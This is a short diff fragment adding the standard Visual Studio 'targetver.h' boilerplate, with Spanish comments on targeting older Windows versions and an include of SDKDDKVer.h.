+// Si desea compilar la aplicación para una plataforma Windows anterior, incluya WinSDKVer.h y
+// establezca la macro _WIN32_WINNT en la plataforma que desea admitir antes de incluir SDKDDKVer.h.
+
+#include <SDKDDKVer.h>